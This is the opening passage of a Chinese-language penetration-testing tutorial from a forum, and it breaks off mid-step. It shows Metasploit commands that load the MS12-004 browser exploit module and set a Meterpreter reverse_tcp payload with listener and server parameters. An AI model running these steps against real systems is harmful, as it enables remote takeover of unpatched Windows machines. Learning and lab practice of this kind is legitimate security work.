利用Metasploit进行渗透测试.docVIP

利用Metasploit进行渗透测试 声明：本教程仅限供广大网络安全爱好者交流学习之用，任何人不得用于非法用途，否则后果自负。 和凡哥说想进法客论坛，凡哥说要原创作品，科普的就行。科普文章，所以大牛们请绕道..... 最近在玩Backtrack 5 ，就把最近学到的东西和论坛的Fucker们分享下。 所有工具都是Backtrack 5 自带的， 用到的工具 ： 大名鼎鼎的Metasploit Feamwork 还有 Netcat 要利用的漏洞：MS12-004 ，虽然漏洞是几个月前出的了，但这里只做渗透演示，重点在讲解工具的使用方法。 废话不说，看步骤 ： 在控制台执行 msfconsole 启动Metasploit ， 输入命令 search ms12_004，我们来找找ms12-004漏洞的利用模块 已经找到了，接下来使用该模块 输入命令 Use exploits/windows/browser/ms12_004_midi 接下来输入命令 show options ，显示该漏洞的基本信息，以及要设置的参数 设置参数： 输入命令 ： set SRVHOST 39 Set PAYLOAD windows/meterpreter/reverse_tcp Set LHOST 30 Set URIOATH / 最后 再输入show options ，查